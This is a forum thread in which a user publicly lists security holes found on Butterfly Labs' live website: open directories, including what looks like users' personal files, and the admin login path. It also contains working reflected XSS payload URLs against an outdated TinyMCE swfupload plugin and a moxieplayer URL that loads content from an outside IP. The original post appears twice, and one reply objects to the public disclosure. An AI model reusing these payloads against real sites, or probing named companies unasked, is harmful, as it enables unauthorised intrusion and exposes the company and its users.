While, it's good of you to alert people. I think you should have alerted them instead of publicly outing their exploits as soon as you found them.
But hey, if your tactic is to get professional penetrators to cause a stir, more power to ya. I just wouldn't have done it this way.
Topic: BFL's site is incredibly amateur... - page 2. (Read 2854 times)
So, after seeing this last night about them leaking their own database login (http://www.reddit.com/r/Bitcoin/comments/1didas/is_butterfly_labs_sql_password_adminbtl123/), I decided to have some fun and poke around the site.
Just for fun, here's what I found:
- Directory Listing Enabled
-- Interesting directories:
--- http://www.butterflylabs.com/upload/
--- http://www.butterflylabs.com/images -
--- http://www.butterflylabs.com/images/users/ <-- What the hell is this stuff? Personal files and photos?
- 2 vulnerable tiny_mce plugins (both vulnerabilities have been fixed for ages, they haven't updated)
-- archiv and it's swfupload XSS. There's 2 seperate XSS' here, using 2 different parameters.
--- using movieName:
-- Some proof: http://butterflylabs.com/images//admin/admin_logo.png - http://www.webspawner.com/admin/login
-- Admin login page: http://butterflylabs.com/admin
Don't trust a company this amateur.
EDIT: Congratulations on the fast fixes. Now disable directory listing @ https://support.butterflylabs.com/
EDIT 2: Everything's fixed. Stay on your toes BFL... I'm not done
Just for fun, here's what I found:
- Directory Listing Enabled
-- Interesting directories:
--- http://www.butterflylabs.com/upload/
--- http://www.butterflylabs.com/images -
--- http://www.butterflylabs.com/images/users/ <-- What the hell is this stuff? Personal files and photos?
- 2 vulnerable tiny_mce plugins (both vulnerabilities have been fixed for ages, they haven't updated)
-- archiv and it's swfupload XSS. There's 2 seperate XSS' here, using 2 different parameters.
--- using movieName:
Code:
www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(%22stay%20classy%20BFL%22);//
--- using buttonText: Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?buttonText=.%3Cimg%20src='http://www.cabelas.com/assets/product_files/image/xss_reel.gif'%3E
-- media plugin uses vulnerable moxieplayer.swf: Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/media/moxieplayer.swf?url=http://198.12.67.18/tears.flv
- Their site was copied from Webspawner. -- Some proof: http://butterflylabs.com/images//admin/admin_logo.png - http://www.webspawner.com/admin/login
-- Admin login page: http://butterflylabs.com/admin
Don't trust a company this amateur.
EDIT: Congratulations on the fast fixes. Now disable directory listing @ https://support.butterflylabs.com/
EDIT 2: Everything's fixed. Stay on your toes BFL... I'm not done
Jump to: